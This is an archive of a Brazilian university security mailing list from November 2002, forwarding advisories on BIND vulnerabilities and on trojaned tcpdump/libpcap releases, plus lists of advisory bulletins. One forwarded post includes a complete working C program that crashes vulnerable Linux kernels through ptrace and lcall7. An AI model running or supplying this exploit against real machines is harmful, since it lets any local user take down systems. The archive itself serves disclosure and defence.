16:15:56 -0200 [ Nota1: A opcao `allow-recursion { 200.x.x.x/xx; localhost; };' tambem resolve em casos onde a recursao para a algumas redes e' requerida. Nota2: No caso do Bind, a familia 9.x e' uma opcao melhor faz tempo ] -----BEGIN PGP SIGNED MESSAGE----- Internet Security Systems Security Brief November 12, 2002 Multiple Remote Vulnerabilities in BIND4 and BIND8 Synopsis: ISS X-Force has discovered several serious vulnerabilities in the Berkeley Internet Name Domain Server (BIND). BIND is the most common implementation of the DNS (Domain Name Service) protocol, which is used on the vast majority of DNS servers on the Internet. DNS is a vital Internet protocol that maintains a database of easy-to-remember domain names (host names) and their corresponding numerical IP addresses. Impact: The vulnerabilities described in this advisory affect nearly all currently deployed recursive DNS servers on the Internet. The DNS network is considered a critical component of Internet infrastructure. There is no information implying that these exploits are known to the computer underground, and there are no reports of active attacks. If exploits for these vulnerabilities are developed and made public, they may lead to compromise and DoS attacks against vulnerable DNS servers. Since the vulnerability is widespread, an Internet worm may be developed to propagate by exploiting the flaws in BIND. Widespread attacks against the DNS system may lead to general instability and inaccuracy of DNS data. Affected Versions: BIND SIG Cached RR Overflow Vulnerability BIND 8, versions up to and including 8.3.3-REL BIND 4, versions up to and including 4.9.10-REL BIND OPT DoS BIND 8, versions 8.3.0 up to and including 8.3.3-REL BIND SIG Expiry Time DoS BIND 8, versions up to and including 8.3.3-REL For the complete ISS X-Force Security Advisory, please visit: http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469 ______ About Internet Security Systems (ISS) Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a pioneer and world leader in software and services that protect critical online resources from an ever- changing spectrum of threats and misuse. Internet Security Systems is headquartered in Atlanta, GA, with additional operations throughout the Americas, Asia, Australia, Europe and the Middle East. Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this document. It is not to be edited or altered in any way without the express written consent of the Internet Security Systems X-Force. If you wish to reprint the whole or any part of this document in any other medium excluding electronic media, please email xforce em iss.net for permission. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. X-Force PGP Key available on MIT's PGP key server and PGP.com's key server, as well as at http://www.iss.net/security_center/sensitive.php Please send suggestions, updates, and comments to: X-Force xforce em iss.net of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBPdExszRfJiV99eG9AQEjKgP/dUFj2Hik6CofyaKqQYWW8LAIgLbZBJKN MZNpNYefF0aXm2lHhwis6XXxYNHHUvUIczRL6deTvxYavjjUdbkQssad5vS0pp/2 1IzU62NgGCHOOaAYUh3ecaYGPXWYoDZFLEMXFuoV6SC0uOpnOXdG+NSSfUwWXDTI rNIJ5UlHox0= =4W9H -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Wed Nov 13 09:40:56 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 13 Nov 2002 09:40:56 -0200 Subject: [SECURITY-L] The Unix Auditor's Practical Handbook Message-ID: <20021113114056.GA4691@ccuec.unicamp.br> ----- Forwarded message from "K. K. Mookhey" ----- From: "K. K. Mookhey" Subject: The Unix Auditor's Practical Handbook To: , , , , , , "Amjad Malik" Date: Tue, 12 Nov 2002 18:45:01 +0530 X-Mailer: Microsoft Outlook Express 5.50.4920.2300 ============================================== "The Unix Auditor's Practical Handbook" http://www.nii.co.in/tuaph.html by K. K. Mookhey Network Intelligence India Pvt. Ltd. http://www.nii.co.in ============================================== We at Network Intelligence India Pvt. Ltd. have written a document on unix auditing called "The Unix Auditor's Practical Handbook", which is available for download from our website http://www.nii.co.in/tuaph.html The idea behind this is to present a step-by-step practical guide to auditors when carrying out a Unix Audit. It mostly covers Sun Solaris systems, but it has cross-references for AIX and Linux. It details the auditing procedure right from the moment you enter the client's server room, to running the automated auditing tools. It covers the following areas of an Audit: 1. Preliminary Steps 2. Documentation 3. Physical Security 4. Operating System Security 5. Network Security 6. Filesystem Security 7. User and Group Security 8. Sun Built-in Auditing 9. Backup and Emergency Response 10. Automated Auditing Tools 11. References We have kept the focus on the practicality of conducting an audit, providing the reader with the commands, filenames, tools, and techniques for carrying out the audit. It is also useful for security administrators, who might be looking to implement security on their Unix Servers. Please send all feedback to unix em nii.co.in Sincerely, K. K. Mookhey CTO Network Intelligence India Pvt. Ltd. Tel: 91-22-22001530, 22006019 Email: cto em nii.co.in Web: www.nii.co.in ============================================================ The steps carried out as part of this document are already present in our automated Unix auditing tool: AuditPro for Unix: http://www.nii.co.in/software/apunix.html ============================================================ ----- End forwarded message ----- From daniela em ccuec.unicamp.br Wed Nov 13 10:55:46 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 13 Nov 2002 10:55:46 -0200 Subject: [SECURITY-L] *** Importante *** CAIS-Alerta: Multiplas Vulnerabilidades no BIND4 e BIND8 Message-ID: <20021113125546.GA4767@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Multiplas Vulnerabilidades no BIND4 e BIND8 To: , Date: Wed, 13 Nov 2002 10:41:32 -0200 (EDT) -----BEGIN PGP SIGNED MESSAGE----- Prezados, O CAIS esta' repassando o alerta divulgado pela ISS, Internet Security Systems, entitulado "Multiple Remote Vulnerabilities in BIND4 and BIND8", tratando da identificacao de tres vulnerabilidades em versões do BIND4 e BIND8. A exploracao de tais vulnerabilidades pode permitir ataques de negação de serviço, ou ainda, a execução de código arbitrário remotamente, em servidores DNS vulneraveis. Sistemas afetados: As versoes a seguir são afetadas pela vulnerabilidade "SIG Cached RR Overflow" (CAN-2002-1219): BIND 8: as versões até e inclusive a 8.3.3-REL BIND 4: as versões até e inclusive a 4.9.10-REL As versoes abaixo, são afetadas pela vulnerabilidade "BIND OPT DoS" (CAN-2002-1220): BIND 8: as versões 8.3.0 até e inclusive a 8.3.3-REL E as seguintes versões são afetadas pela vulnerabilidade "BIND SIG Expiry Time DoS" (CAN-2002-1221): BIND 8: as versões até e inclusive a 8.3.3-REL Correcoes disponiveis: Recomenda-se a atualização para as seguintes versões do BIND: 4.9.11, 8.2.7, 8.3.4 ou BIND9, ressaltando que o BIND9 não é afetado por nenhuma das vulnerabilidades mencionadas neste alerta. Maiores detalhes sobre as versões recomendadas para atualização, estão disponíveis em: http://www.isc.org/products/BIND/bind-security.html Maiores informacoes: http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469 Identificadores do CVE: CAN-2002-1219, CAN-2002-1220, CAN-2002-1221 (http://cve.mitre.org) O CAIS recomenda fortemente aos administradores que mantenham seus sistemas e aplicativos sempre atualizados. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ Internet Security Systems Security Brief November 12, 2002 Multiple Remote Vulnerabilities in BIND4 and BIND8 Synopsis: ISS X-Force has discovered several serious vulnerabilities in the Berkeley Internet Name Domain Server (BIND). BIND is the most common implementation of the DNS (Domain Name Service) protocol, which is used on the vast majority of DNS servers on the Internet. DNS is a vital Internet protocol that maintains a database of easy-to-remember domain names (host names) and their corresponding numerical IP addresses. Impact: The vulnerabilities described in this advisory affect nearly all currently deployed recursive DNS servers on the Internet. The DNS network is considered a critical component of Internet infrastructure. There is no information implying that these exploits are known to the computer underground, and there are no reports of active attacks. If exploits for these vulnerabilities are developed and made public, they may lead to compromise and DoS attacks against vulnerable DNS servers. Since the vulnerability is widespread, an Internet worm may be developed to propagate by exploiting the flaws in BIND. Widespread attacks against the DNS system may lead to general instability and inaccuracy of DNS data. Affected Versions: BIND SIG Cached RR Overflow Vulnerability BIND 8, versions up to and including 8.3.3-REL BIND 4, versions up to and including 4.9.10-REL BIND OPT DoS BIND 8, versions 8.3.0 up to and including 8.3.3-REL BIND SIG Expiry Time DoS BIND 8, versions up to and including 8.3.3-REL For the complete ISS X-Force Security Advisory, please visit: http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469 ______ About Internet Security Systems (ISS) Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a pioneer and world leader in software and services that protect critical online resources from an ever- changing spectrum of threats and misuse. Internet Security Systems is headquartered in Atlanta, GA, with additional operations throughout the Americas, Asia, Australia, Europe and the Middle East. Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this document. It is not to be edited or altered in any way without the express written consent of the Internet Security Systems X-Force. If you wish to reprint the whole or any part of this document in any other medium excluding electronic media, please email xforce em iss.net for permission. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. X-Force PGP Key available on MIT's PGP key server and PGP.com's key server, as well as at http://www.iss.net/security_center/sensitive.php Please send suggestions, updates, and comments to: X-Force xforce em iss.net of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBPdJIhekli63F4U8VAQE2KAP8D5cvRTzQquCPKSJq7EEO4JT8PoQ3/kIK xl8pI1rwAd+gtchHl1d4CnplKzBuQIwMqNkRwFr4c8PUwltDYnuteT8blAVYiAYL 68QmtztYncVC0R959f3hGgAo0DYElkfJe4PHoHNvFULFFJiuE1jHtNrXuaMjr4m2 8YHrpOqGGDY= =UOlV -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Wed Nov 13 14:30:29 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 13 Nov 2002 14:30:29 -0200 Subject: [SECURITY-L] Trojan Found in libpcap and tcpdump Message-ID: <20021113163029.GA5025@ccuec.unicamp.br> ----- Forwarded message from Nelson Murilo ----- From: Nelson Murilo Subject: [S] Trojan Found in libpcap and tcpdump To: seguranca em pangeia.com.br Date: Wed, 13 Nov 2002 14:02:52 -0200 [http://slashdot.org/article.pl?sid=02/11/13/1255243&tid=172] --- SNIP --- Posted by michael on Wednesday November 13, @08:24AM from the when-your-packet-sniffer-won't dept. msolnik writes "Members of The Houston Linux Users Group[1] discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here[2] or here[3]." --- SNIP --- [1] http://www.hlug.org/ [2] http://hlug.fscker.com/ [3] http://151.164.128.17/def-con/ ----- End forwarded message ----- From daniela em ccuec.unicamp.br Wed Nov 13 15:04:41 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 13 Nov 2002 15:04:41 -0200 Subject: [SECURITY-L] CAIS-Alerta: Trojan Horse no Tcpdump e Libpcap Message-ID: <20021113170441.GA5096@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Trojan Horse no Tcpdump e Libpcap To: , Date: Wed, 13 Nov 2002 14:50:36 -0200 (EDT) -----BEGIN PGP SIGNED MESSAGE----- Prezados, O CAIS esta' repassando informacoes tratando do comprometimento dos pacotes Tcpdump e Libpcap onde foram identificadas a presenca de um cavalo de troia. As primeiras informacoes sao de que as versoes foram alteradas no dia 31/10/2002. A versao alterada possui um trecho de codigo malicioso que e' executado durante o processo de geracao dos binarios. Este codigo malicioso inicia uma conexao em um servidor remoto, 212.146.0.34 (mars.raketti.net), na porta 1963/tcp. Sistemas afetados: http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz Versoes corretas dos hashes MD5: MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz O CAIS recomenda aos administradores que sempre verifiquem a integridade de pacotes antes de proceder com uma atualizacao ou instalacao. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBPdKC6ukli63F4U8VAQFKYgP8CFPmWQ+ay1rjiO7wd9CubNRBNfC0vGEy Sw+6izSAAK/te6Tx9x+mgF2Tamc0mSguDwKJm2VUqwDFHB1deiBGqsX2LCIDs8LI HDn9sbCfrl20jAcDv9rEfCRgo8kCJ+nDXa/ETqjZW3uQpJzpFxbjOtDK8OLV35oy T/K6yqFy+Vc= =1ju9 -----END PGP SIGNATURE----- ----- End forwarded message ----- From mieko em ccuec.unicamp.br Wed Nov 13 20:12:50 2002 From: mieko em ccuec.unicamp.br (Silvana Mieko Misuta) Date: Wed, 13 Nov 2002 20:12:50 -0200 Subject: [SECURITY-L] Vulnerabilidades de Seguranca Message-ID: <20021113221250.GA5506@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 13/11/2002 ---------- CAIS-Alerta Assunto: Trojan Horse no Tcpdump e Libpcap http://www.security.unicamp.br/docs/bugs/2002/11/v42.txt Debian Security Advisory (DSA 195-1) Assunto: vulnerabilidades de seguranca no pacote apache-perl http://www.security.unicamp.br/docs/bugs/2002/11/v41.txt CAIS-Alerta Assunto: Multiplas Vulnerabilidades no BIND4 e BIND8 http://www.security.unicamp.br/docs/bugs/2002/11/v40.txt 12/11/2002 ---------- FreeBSD Security Advisory (FreeBSD-SA-02:42) Assunto: buffer overrun in resolver http://www.security.unicamp.br/docs/bugs/2002/11/v39.txt FreeBSD Security Advisory (FreeBSD-SA-02:41) Assunto: smrsh restrictions can be bypassed http://www.security.unicamp.br/docs/bugs/2002/11/v38.txt FreeBSD Security Advisory (FreeBSD-SA-02:40) Assunto: Buffer overflow in kadmind daemon http://www.security.unicamp.br/docs/bugs/2002/11/v37.txt ISS Security Advisory Assunto: Multiple Remote Vulnerabilities in BIND4 and BIND8 http://www.security.unicamp.br/docs/bugs/2002/11/v36.txt SGI Security Advisory (20021104-01-P) Assunto: IRIX lpd daemon vulnerabilities via sendmail and dns http://www.security.unicamp.br/docs/bugs/2002/11/v35.txt SCO Security Advisory (CSSA-2002-042.0) Assunto: Linux: libpng progressive image loading vulnerabilities and other buffer overflows http://www.security.unicamp.br/docs/bugs/2002/11/v34.txt Debian Security Advisory (DSA 194-1) Assunto: vulnerabilidade de seguranca no pacote masqmail http://www.security.unicamp.br/docs/bugs/2002/11/v33.txt Novell (NOVL-2002-2963767) Assunto: Remote Manager Security Issue - eDir 8.6.2 http://www.security.unicamp.br/docs/bugs/2002/11/v32.txt Novell - Netware 5.1 (NOVL-2002-2963827) Assunto: Remote Manager Security Issue - NW5.1 http://www.security.unicamp.br/docs/bugs/2002/11/v31.txt GENTOO LINUX SECURITY ANNOUNCEMENT (200211-003) Assunto: vulnerabilidades de seguranca no Apache http://www.security.unicamp.br/docs/bugs/2002/11/v30.txt SuSE Security Announcement (SuSE-SA:2002:043) Assunto: vulnerabilidades de seguranca no pacote traceroute-nanog/nkitb http://www.security.unicamp.br/docs/bugs/2002/11/v29.txt SuSE Security Announcement (SuSE-SA:2002:042) Assunto: vulnerabilidades de seguranca no pacote kdenetwork http://www.security.unicamp.br/docs/bugs/2002/11/v28.txt 11/11/2002 ---------- KDE Security Advisory (2002-11-11) Assunto: resLISa / LISa Vulnerabilities http://www.security.unicamp.br/docs/bugs/2002/11/v27.txt SCO Security Advisory (CSSA-2002-044.0) Assunto: Linux: Preboot eXecution Environment (PXE) server denial-of-service attacks-of-service attacks http://www.security.unicamp.br/docs/bugs/2002/11/v26.txt KDE Security Advisory (2002-11-11) Assunto: rlogin.protocol and telnet.protocol URL KIO Vulnerability http://www.security.unicamp.br/docs/bugs/2002/11/v25.txt Novell - Netware 6 SP2 (NOVL-2002-2963651) Assunto: iManager (eMFrame) Buffer Overflow http://www.security.unicamp.br/docs/bugs/2002/11/v24.txt Red Hat Security Advisory (RHSA-2002:213-06) Assunto: New PHP packages fix vulnerability in mail function http://www.security.unicamp.br/docs/bugs/2002/11/v23.txt Debian Security Advisory (DSA 193-1) Assunto: vulnerabilidade de seguranca no pacote kdenetwork http://www.security.unicamp.br/docs/bugs/2002/11/v22.txt 10/11/2002 ---------- GENTOO LINUX SECURITY ANNOUNCEMENT (200211-002) Assunto: keys generated in wizard have an empty passphrase http://www.security.unicamp.br/docs/bugs/2002/11/v21.txt 08/11/2002 ---------- Debian Security Advisory (DSA 192-1) Assunto: vulnerabilidade de seguranca no pacote html2ps http://www.security.unicamp.br/docs/bugs/2002/11/v20.txt 07/11/2002 ---------- SGI Security Advisory (20021103-01-P) Assunto: Potential Denial of Service Vulnerability in RPC-based libc http://www.security.unicamp.br/docs/bugs/2002/11/v19.txt Debian Security Advisory (DSA 191-2) Assunto: vulnerabilidade de seguranca no pacote squirrelmail http://www.security.unicamp.br/docs/bugs/2002/11/v18.txt Mandrake Linux Security Update Advisory (MDKSA-2002:076) Assunto: vulnerabilidade de seguranca no pacote perl-MailTools http://www.security.unicamp.br/docs/bugs/2002/11/v17.txt Mandrake Linux Security Update Advisory (MDKSA-2002:075) Assunto: vulnerabilidade de seguranca no pacote nss_ldap http://www.security.unicamp.br/docs/bugs/2002/11/v16.txt 05/11/2002 ---------- Debian Security Advisory (DSA 188-1) Assunto: vulnerabilidade de seguranca no pacote apache-ssl http://www.security.unicamp.br/docs/bugs/2002/11/v15.txt NetBSD Security Advisory (2002-024) Assunto: vulnerabilidade de seguranca no IPFilter FTP proxy http://www.security.unicamp.br/docs/bugs/2002/11/v14.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Thu Nov 14 10:19:03 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 14 Nov 2002 10:19:03 -0200 Subject: [SECURITY-L] DOS no kernel do Linux Message-ID: <20021114121903.GB6444@ccuec.unicamp.br> ----- Forwarded message from Leandro Martelli ----- From: Leandro Martelli Subject: DOS no kernel do Linux To: daniela em ccuec.unicamp.br Date: 14 Nov 2002 09:49:03 -0200 Organization: X-Mailer: Ximian Evolution 1.2.0 Cara Daniela, Como ainda nao vi noticiado na lista, segue o link sobre um bug no kernel que permite qualquer usuario local travar a maquina. http://online.securityfocus.com/archive/1/299687 === Martelli ----------------------------------------------------------- >Regarding this issue: is it 80x86 or specifically 80386 designed ? > Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :( Yep; the first version of the DoS I posted on bugtraq was defective and worked only under special conditions (inside gdb for example). However this updated version works much better: #include struct user_regs_struct { long ebx, ecx, edx, esi, edi, ebp, eax; unsigned short ds, __ds, es, __es; unsigned short fs, __fs, gs, __gs; long orig_eax, eip; unsigned short cs, __cs; long eflags, esp; unsigned short ss, __ss; }; int main( void ) { int pid; char dos[] = "\x9A\x00\x00\x00\x00\x07\x00"; void (* lcall7)( void ) = (void *) dos; struct user_regs_struct d; if( ! ( pid = fork() ) ) { usleep( 1000 ); (* lcall7)(); } else { ptrace( PTRACE_ATTACH, pid, 0, 0 ); while( 1 ) { wait( 0 ); ptrace( PTRACE_GETREGS, pid, 0, &d ); d.eflags |= 0x4100; /* set TF and NT */ ptrace( PTRACE_SETREGS, pid, 0, &d ); ptrace( PTRACE_SYSCALL, pid, 0, 0 ); } } return 1; } At the beginning I thought only kernels <= 2.4.18 were affected; but it appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well. The flaw seems to be related to the kernel's handling of the nested task (NT) flag inside a lcall7. -- Christophe Devine --------------------------------------------------------- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Nov 14 14:16:04 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 14 Nov 2002 14:16:04 -0200 Subject: [SECURITY-L] Nova beta do Opera Message-ID: <20021114161604.GA6816@ccuec.unicamp.br> ----- Forwarded message from Caio Souza Mendes ----- From: Caio Souza Mendes Subject: Nova beta do Opera To: daniela em ccuec.unicamp.br Date: Wed, 13 Nov 2002 23:47:42 -0300 (ART) Nova beta do Opera Código está sendo reescrito [13/11/2002] A primeira beta da versão 7 do navegador Opera foi lançada ontem à noite e já está disponível para download. Segundo a empresa, o código da próxima versão do programa está sendo amplamente revisado. Entre as novidades, estão um novo cliente de email e uma tecnologia (Small Screen Rendering) que permitirá navegar através de pequenos dispositivos. Há também uma opção de múltiplos perfis, que deixa que cada usuário personalize sua interface gráfica. A versão beta está disponível para download no site: http://www.opera.com/ Fonte: Geek - http://geek.cidadeinternet.com.br/article.asp?int_id_session=147&int_id_article=16749 ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Nov 14 14:18:06 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 14 Nov 2002 14:18:06 -0200 Subject: [SECURITY-L] Ferramenta de seguranca e biblioteca para Linux possui trojan Message-ID: <20021114161806.GB6816@ccuec.unicamp.br> ----- Forwarded message from Caio Souza Mendes ----- From: Caio Souza Mendes Subject: Ferramenta de seguranXa e biblioteca para Linux possui trojan To: daniela em ccuec.unicamp.br Date: Thu, 14 Nov 2002 12:17:24 -0300 (ART) Notícia :: Ferramenta de segurança e biblioteca para Linux possui trojan :: 14/11/2002 @ 10:54:13 Foi divulgado ontem que algumas versões do tcpdump e da biblioteca libpcap possui um trojan (cavalo de tróia) instalado em seus códigos fontes possibilitando para o atacante ganhar acesso remoto ao servidor. Para quem não conhece o tcpdump é uma ferramenta utilizada para capturar pacotes de uma rede e mostrar informações referentes ao conteúdo desses pacotes ou então gravar os mesmos em um arquivo. A libpcap é uma biblioteca utilizada para capturas de pacotes (sniffing) em uma rede, dentre os programas que utilizam esta biblioteca está o conhecido Intrusion Detection System (IDS) Snort. O trojan inicialmente busca um arquivo em um servidor remoto http://mars.raketti.net/~mash/services, que é um shell script onde gera um programa em C, compila e o executa. Após isso tenta conectar no IP 212.146.0.34 (mars.raketti.net), na porta 1963 onde receberá um código de status que determinará sua ação. As versões 3.7.1 e 3.6.2 do tcpdump e a versão 0.7.1 da biblioteca libpcap estão afetadas. É aconselhado ao administrador sempre verificar o Hash MD5 para evitar possíveis problemas. Maiores informações podem ser obtidas através do endereço abaixo. [Libpcap and tcpdump trojaned on tcpdump.org] http://hlug.fscker.com/ Fonte: Telsinc Security - http://www.telsincsecurity.com.br/?menu=noticia¬id=256 ----- End forwarded message ----- From mieko em ccuec.unicamp.br Thu Nov 14 18:26:58 2002 From: mieko em ccuec.unicamp.br (Silvana Mieko Misuta) Date: Thu, 14 Nov 2002 18:26:58 -0200 Subject: [SECURITY-L] Boletin de Noticias Message-ID: <20021114202654.GA7026@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e redes da Unicamp com os seguintes boletins de noticias e/ou revistas eletronicas: 13/11/2002 ---------- Modulo Security News no. 269 Fonte: Modulo Security Solutions S/A http://www.security.unicamp.br/docs/informativos/2002/11/b9.txt SANS NewsBites Vol. 4 Num. 46 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2002/11/b8.txt 11/11/2002 ---------- SecurityFocus Newsletter Fonte: SecurityFocus.com http://www.security.unicamp.br/docs/informativos/2002/11/b7.txt SANS Critical Vulnerability Analysis Vol. 1 Num. 16 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2002/11/b6.txt 06/11/2002 ---------- Modulo Security News no. 268 Fonte: Modulo Security Solutions S/A http://www.security.unicamp.br/docs/informativos/2002/11/b5.txt SANS NewsBites Vol. 4 Num. 45 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2002/11/b4.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From mieko em unicamp.br Thu Nov 14 19:49:41 2002 From: mieko em unicamp.br (Silvana Mieko Misuta) Date: Thu, 14 Nov 2002 19:49:41 -0200 Subject: [SECURITY-L] [CAIS-Alerta: CERT Advisory CA-2002-30 Trojan Horse tcpdump andlibpcap Distributions] Message-ID: <3DD41A75.A4721C0@unicamp.br> -------------- Próxima Parte ---------- Uma mensagem embutida foi limpa... De: Centro de Atendimento a Incidentes de Seguranca Assunto: CAIS-Alerta: CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions Data: Thu, 14 Nov 2002 10:11:02 -0200 (EDT) Tamanho: 11677 URL: From mieko em ccuec.unicamp.br Thu Nov 14 19:43:45 2002 From: mieko em ccuec.unicamp.br (Silvana Mieko Misuta) Date: Thu, 14 Nov 2002 19:43:45 -0200 Subject: [SECURITY-L] Vulnerabilidades de Seguranca Message-ID: <20021114214345.GA7105@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 14/11/2002 ---------- CAIS-Alerta(CA-2002-31) Assunto: Multiple Vulnerabilities in BIND http://www.security.unicamp.br/docs/bugs/2002/11/v50.txt CAIS-Alerta(CA-2002-30) Assunto: CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions http://www.security.unicamp.br/docs/bugs/2002/11/v49.txt AN\xdaNCIO DE SEGURAN\xc7A DO CONECTIVA LINUX(CLA-2002:547) Assunto: Vulnerabilidade de buffer overflow http://www.security.unicamp.br/docs/bugs/2002/11/v48.txt AN\xdaNCIO DE SEGURAN\xc7A DO CONECTIVA LINUX(CLA-2002:546) Assunto: Vulnerabilidades remotas no servidor de DNS BIND http://www.security.unicamp.br/docs/bugs/2002/11/v47.txt CERT Advisory (CA-2002-31) Assunto: Multiple Vulnerabilities in BIND http://www.security.unicamp.br/docs/bugs/2002/11/v46.txt 13/11/2002 ---------- AN\xdaNCIO DE SEGURAN\xc7A DO CONECTIVA LINUX(CLA-2002:545) Assunto: Falha no modo seguro do php e outras vulnerabilidades http://www.security.unicamp.br/docs/bugs/2002/11/v45.txt CERT Advisory (CA-2002-30) Assunto: Trojan Horse tcpdump and libpcap Distributions http://www.security.unicamp.br/docs/bugs/2002/11/v44.txt 12/11/2002 ---------- SGI Security Advisory (20021105-01-I) Assunto: Apache Security Vulnerabilities http://www.security.unicamp.br/docs/bugs/2002/11/v43.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From mieko em unicamp.br Thu Nov 14 19:49:53 2002 From: mieko em unicamp.br (Silvana Mieko Misuta) Date: Thu, 14 Nov 2002 19:49:53 -0200 Subject: [SECURITY-L] [CAIS-Alerta: CERT Advisory CA-2002-31 Multiple Vulnerabilities inBIND] Message-ID: <3DD41A81.B080B7D8@unicamp.br> -------------- Próxima Parte ---------- Uma mensagem embutida foi limpa... De: Centro de Atendimento a Incidentes de Seguranca Assunto: CAIS-Alerta: CERT Advisory CA-2002-31 Multiple Vulnerabilities in BIND Data: Thu, 14 Nov 2002 10:12:06 -0200 (EDT) Tamanho: 18293 URL: From mieko em ccuec.unicamp.br Mon Nov 18 13:33:57 2002 From: mieko em ccuec.unicamp.br (Silvana Mieko Misuta) Date: Mon, 18 Nov 2002 13:33:57 -0200 Subject: [SECURITY-L] Vulnerabilidades de Seguranca Message-ID: <20021118153357.GA495@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 18/11/2002 ---------- Anuncio de Seguranca do Conectiva Linux(CLA-2002:548) Assunto: Vulnerabilidade no carregamento de imagens(windowmaker) http://www.security.unicamp.br/docs/bugs/2002/11/v67.txt 16/11/2002 ---------- Red Hat Security Advisory(RHSA-2002:262-07) Assunto: New kernel fixes local denial of service issue http://www.security.unicamp.br/docs/bugs/2002/11/v66.txt 15/11/2002 ---------- SCO Security Advisory(CSSA-2002-047.0) Assunto: Linux: KDE SSL and XSS vulnerabilities http://www.security.unicamp.br/docs/bugs/2002/11/v65.txt OpenPKG Security Advisory(OpenPKG-SA-2002.011) Assunto: Vulnerabilidade de Seguranca nos pacotes bind, bind8 http://www.security.unicamp.br/docs/bugs/2002/11/v64.txt Debian Security Advisory (DSA 197-1) Assunto: Vulnerabilidade de Seguranca no pacote courier http://www.security.unicamp.br/docs/bugs/2002/11/v63.txt FreeBSD Security Advisory (FreeBSD-SA-02:43) Assunto: Vulnerabilidade de Seguranca no pacote bind 